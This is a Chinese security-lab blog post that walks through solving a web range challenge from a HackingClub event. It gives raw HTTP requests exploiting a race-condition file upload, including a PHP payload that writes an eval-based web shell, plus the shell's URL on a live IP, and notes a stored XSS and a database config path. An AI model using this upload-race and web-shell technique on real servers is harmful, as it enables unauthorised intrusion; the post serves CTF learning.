0x01前言:
不知道大家是否还记得,在HackingClub首场线下技术趴,在最后互动环节公开的靶场:
在各位大佬各显神通后,终于在两个半小时后拿到webshell!
事后,我们对外开放了几天的靶场环境,供大家玩耍:
然后很多大佬找到我,想要这套程序的源码,所以今天决定放出来!
0x02解题方法:
根据提示,找到了上传点:
经过多番尝试,发现是条件竞争上传漏洞:
包内容:
POST /onup/upload.php HTTP/1.1 Host: 39.98.78.223 Content-Length: 266 Cache-Control: max-age=0 Origin: http://39.98.78.223 Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryviDgu5MACkZpSdGS User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://39.98.78.223/onup/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ko;q=0.7 Cookie: PHPSESSID=pole4gfa4peo53v4b6itu2tsq2 Connection: close
------WebKitFormBoundaryviDgu5MACkZpSdGS Content-Disposition: form-data; name="file"; filename="file.php" Content-Type: application/octet-stream
<?php fputs(fopen('shell.php','w'),'<?php @eval($_POST["test"])?>');?> ------WebKitFormBoundaryviDgu5MACkZpSdGS-- |
GET /onup/upload/file.php HTTP/1.1 Host: 39.98.78.223 DNT: 1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ko;q=0.7 Cookie: PHPSESSID=pole4gfa4peo53v4b6itu2tsq2 Connection: close
|
http://39.98.78.223/onup/upload/shell.php |
Getshell
0x03后话:
其实如果没有那么限制,还有其他方法解题,那么,舞台交给大家!
代码审计吧!
(已知XSS存储)
(数据库在根目录下,数据库配置文件在WWWAppConfconfig.db.php)
0x04源码下载:
关注公众号,回复:假冒贷款
即可下载程序源码!
(限时24小时!请尽快下载!请于下载后请24小时内删除!仅供学习之用)
扫码关注不迷路
简历请投递[email protected]
开普勒安全团队欢迎你
本文始发于微信公众号(弥天安全实验室):填坑!公开假冒套路贷款程序源码(限时)
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论